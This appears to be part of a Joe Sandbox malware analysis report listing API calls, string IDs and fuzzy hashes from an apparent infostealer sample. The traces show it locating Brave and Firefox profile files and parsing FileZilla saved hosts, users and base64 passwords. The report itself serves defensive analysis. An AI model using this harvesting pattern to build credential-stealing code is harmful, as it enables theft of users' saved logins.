                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDD7B
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDA3
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDDAF
                                  • lstrlen.KERNEL32(?), ref: 00FBDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDE19
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDE6F
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDE7B
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDEBB
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDEE6
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDEF2
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFA5
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDFB1
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDFF4
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE022
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBE02E
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 00FBE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FBE0E7
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE11F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FBE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE19F
                                  • lstrcat.KERNEL32(00000000), ref: 00FBE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FBE1F9
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE22F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FBE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE261
                                  • lstrcat.KERNEL32(00000000,01B991C8), ref: 00FBE269
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FBE988
                                  • FindClose.KERNEL32(00000000), ref: 00FBE997
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                  • String ID: Brave$Preferences$\Brave\Preferences
                                  • API String ID: 1346089424-1230934161
                                  • Opcode ID: 8208f02ead67d8ae059883fe32f0141c0efd1269a6b7fe053284925fc20f9d2f
                                  • Instruction ID: dbbb7b859cf4ec6e3048d107d29178ecccd7d6a78165c9d24c3c47dd6ce7053e
                                  • Opcode Fuzzy Hash: 8208f02ead67d8ae059883fe32f0141c0efd1269a6b7fe053284925fc20f9d2f
                                  • Instruction Fuzzy Hash: 9F527170D1120A9BDB65EFA6DC89AEE7BF9AF44314F044028F815AB245DB38DC41EF91
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB60FF
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6152
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6185
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB61B5
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB61F0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB6223
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB6233
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$InternetOpen
                                  • String ID: "$------
                                  • API String ID: 2041821634-2370822465
                                  • Opcode ID: c689d5112fd7a47aa22787a9f564c66ff3d2af037f8af03313092ef6a27f6c58
                                  • Instruction ID: 3b1c29054fa3d1bf28b2bf81897f3b82204e745cb19b9e55efd43749e62583bf
                                  • Opcode Fuzzy Hash: c689d5112fd7a47aa22787a9f564c66ff3d2af037f8af03313092ef6a27f6c58
                                  • Instruction Fuzzy Hash: 8B525D71D1021A9BDB21EFA5DC49AEEB7B9AF44710F194028F815EB245DB38EC41EF90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6B9D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6BCD
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6BFD
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6C2F
                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00FC6C3C
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC6C43
                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00FC6C5A
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6C65
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6CA8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6CCF
                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 00FC6CE2
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6CED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6D30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6D57
                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00FC6D6A
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6D75
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6DB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6DDF
                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00FC6DF2
                                  • lstrlen.KERNEL32(00000000), ref: 00FC6E01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6E49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6E71
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00FC6E94
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00FC6EA8
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00FC6EC9
                                  • LocalFree.KERNEL32(00000000), ref: 00FC6ED4
                                  • lstrlen.KERNEL32(?), ref: 00FC6F6E
                                  • lstrlen.KERNEL32(?), ref: 00FC6F81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 2641759534-2314656281
                                  • Opcode ID: 355f39c50718fac3e110f057e10313abed5ffab91156c9e4a92d8fe8432e06ff
                                  • Instruction ID: 0cf70499f4f2f9a95dd6e232871deb6aaa398550a0602b7a4309a7f9bba0cbee
                                  • Opcode Fuzzy Hash: 355f39c50718fac3e110f057e10313abed5ffab91156c9e4a92d8fe8432e06ff
                                  • Instruction Fuzzy Hash: BB029130E14216ABDB25EBF1DD4AF9E7BBDAF44714F040428F816EB241DB38D941AB61
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4B7F
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BA7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC4BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 2567437900-3783873740
                                  • Opcode ID: 70c8cd5c2504a807a3f2c27f2f71347f07e58cd2e0da99fad8c32f8be76cc0dd
                                  • Instruction ID: 088fdf4ece288f3683b634b78d22dfb0abd6c1019d69437e6f9282e17a9628bb
                                  • Opcode Fuzzy Hash: 70c8cd5c2504a807a3f2c27f2f71347f07e58cd2e0da99fad8c32f8be76cc0dd
                                  • Instruction Fuzzy Hash: 2D926F30A016068FDB28DF69CA59F59B7E5AF44728F1980ADE809DB391D735EC81EF40
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC12BF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12E7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC133A
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC135C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC1376
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC13E2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC140A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1416
                                  • lstrlen.KERNEL32(?), ref: 00FC1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC147A
                                  • StrCmpCA.SHLWAPI(?,01B9D688), ref: 00FC14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1535
                                  • StrCmpCA.SHLWAPI(?,01B9D910), ref: 00FC1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC15E4
                                  • StrCmpCA.SHLWAPI(?,01B9D5C8), ref: 00FC1602
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1633
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC165C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1685
                                  • StrCmpCA.SHLWAPI(?,01B9D520), ref: 00FC16B3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC16F4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC171D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1745
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC17BE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC17F5
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FC181C
                                  • FindClose.KERNEL32(00000000), ref: 00FC182B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 1346933759-0
                                  • Opcode ID: 255a1acc52001b646f4181ba2399a0010eed2830bb631bf5fdd5d6cae900f5eb
                                  • Instruction ID: c5fc89ac02afd847f0ca836dce4f1da03f1c50fd01339497c08def90ab2b8342
                                  • Opcode Fuzzy Hash: 255a1acc52001b646f4181ba2399a0010eed2830bb631bf5fdd5d6cae900f5eb
                                  • Instruction Fuzzy Hash: 9312A070A1020A8BDB24EFB9D98AEAE77F8BF45314F04452CF856D7241DB38DC55AB90
                                  APIs
                                  • wsprintfA.USER32 ref: 00FCCBFC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FCCC13
                                  • lstrcat.KERNEL32(?,?), ref: 00FCCC5F
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FCCC71
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FCCC8B
                                  • wsprintfA.USER32 ref: 00FCCCB0
                                  • PathMatchSpecA.SHLWAPI(?,01B99248), ref: 00FCCCE2
                                  • CoInitialize.OLE32(00000000), ref: 00FCCCEE
                                    • Part of subcall function 00FCCAE0: CoCreateInstance.COMBASE(00FDB110,00000000,00000001,00FDB100,?), ref: 00FCCB06
                                    • Part of subcall function 00FCCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00FCCB46
                                    • Part of subcall function 00FCCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00FCCBC9
                                  • CoUninitialize.COMBASE ref: 00FCCD09
                                  • lstrcat.KERNEL32(?,?), ref: 00FCCD2E
                                  • lstrlen.KERNEL32(?), ref: 00FCCD3B
                                  • StrCmpCA.SHLWAPI(?,00FDCFEC), ref: 00FCCD55
                                  • wsprintfA.USER32 ref: 00FCCD7D
                                  • wsprintfA.USER32 ref: 00FCCD9C
                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 00FCCDB0
                                  • wsprintfA.USER32 ref: 00FCCDD8
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00FCCDF1
                                  • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00FCCE10
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00FCCE28
                                  • CloseHandle.KERNEL32(00000000), ref: 00FCCE33
                                  • CloseHandle.KERNEL32(00000000), ref: 00FCCE3F
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FCCE54
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCCE94
                                  • FindNextFileA.KERNEL32(?,?), ref: 00FCCF8D
                                  • FindClose.KERNEL32(?), ref: 00FCCF9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                  • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 3860919712-2388001722
                                  • Opcode ID: c95684adbe000a081e6a2dc1efdecc0994597d51823f63d115a9bfc78098e8b9
                                  • Instruction ID: 8ff338f06f6f3cbfac1f7f9f8d52c0b5c5f968c829409cc3137e300580ca6950
                                  • Opcode Fuzzy Hash: c95684adbe000a081e6a2dc1efdecc0994597d51823f63d115a9bfc78098e8b9
                                  • Instruction Fuzzy Hash: A1C17F719002099BCB64EFA4DD45FEE77B9BF44300F0445A8F51AA7284EB34AE84DFA1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC1291
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12B4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC12BF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FC12CA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC12E7
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FC12F3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC131E
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC133A
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC135C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC1376
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC13AF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC13D7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC13E2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC13ED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC140A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1416
                                  • lstrlen.KERNEL32(?), ref: 00FC1423
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1443
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC1451
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC147A
                                  • StrCmpCA.SHLWAPI(?,01B9D688), ref: 00FC14A3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC14E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC150D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1535
                                  • StrCmpCA.SHLWAPI(?,01B9D910), ref: 00FC1552
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1593
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC15BC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC15E4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1796
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC17BE
